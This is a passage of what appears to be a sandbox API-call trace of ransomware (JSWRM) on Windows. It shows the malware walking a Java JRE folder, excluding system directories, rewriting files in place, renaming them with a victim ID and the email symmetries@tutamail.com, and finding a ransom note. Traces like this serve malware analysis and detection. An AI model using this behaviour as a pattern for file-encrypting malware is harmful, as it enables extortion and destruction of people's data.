lpMultiByteStr=0x241290, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jmxremote.password.template", lpUsedDefaultChar=0x0) returned 27 [0070.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0070.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0070.912] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.912] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2856) returned 1 [0070.912] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb20) returned 0x24e1e0 [0070.913] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xb20, lpOverlapped=0x0) returned 1 [0070.914] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.914] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xb20, lpOverlapped=0x0) returned 1 [0070.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.914] CloseHandle (hObject=0x458) returned 1 [0070.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0070.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0070.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0070.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0070.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.915] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.915] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20eb8e44, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20eb8e44, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20eb8e44, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.915] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.915] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.915] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.916] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0070.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0070.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0070.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0070.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0070.916] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3926, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="management.properties", cAlternateFileName="MANAGE~1.PRO")) returned 1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2=".") returned 1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="..") returned 1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="...") returned 1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="windows") returned -1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="recovery") returned -1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="perflogs") returned -1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="documents and settings") returned 1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="system volume information") returned -1 [0070.916] lstrcmpiW (lpString1="management.properties", lpString2="msocache") returned -1 [0070.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.properties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0070.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0070.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.properties", cchWideChar=21, lpMultiByteStr=0x240f70, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management.properties", lpUsedDefaultChar=0x0) returned 21 [0070.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.properties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0070.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0070.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.properties", cchWideChar=21, lpMultiByteStr=0x240f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management.properties", lpUsedDefaultChar=0x0) returned 21 [0070.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.917] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.917] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14630) returned 1 [0070.917] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3920) returned 0x24e1e0 [0070.917] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x3920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x3920, lpOverlapped=0x0) returned 1 [0070.919] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.920] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x3920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x3920, lpOverlapped=0x0) returned 1 [0070.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.920] CloseHandle (hObject=0x458) returned 1 [0070.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0070.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0070.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0070.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0070.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0070.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0070.921] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="snmp.acl.template", cAlternateFileName="SNMPAC~1.TEM")) returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2=".") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="..") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="...") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="windows") returned -1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="recovery") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="perflogs") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="documents and settings") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="$RECYCLE.BIN") returned 1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="system volume information") returned -1 [0070.921] lstrcmpiW (lpString1="snmp.acl.template", lpString2="msocache") returned 1 [0070.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snmp.acl.template", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0070.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snmp.acl.template", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="snmp.acl.template", lpUsedDefaultChar=0x0) returned 17 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snmp.acl.template", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0070.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snmp.acl.template", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="snmp.acl.template", lpUsedDefaultChar=0x0) returned 17 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.922] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.922] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3376) returned 1 [0070.923] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd30) returned 0x24e1e0 [0070.923] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xd30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xd30, lpOverlapped=0x0) returned 1 [0070.924] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.924] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xd30, lpOverlapped=0x0) returned 1 [0070.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.924] CloseHandle (hObject=0x458) returned 1 [0070.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0070.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0070.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0070.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.925] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0070.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0070.926] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, 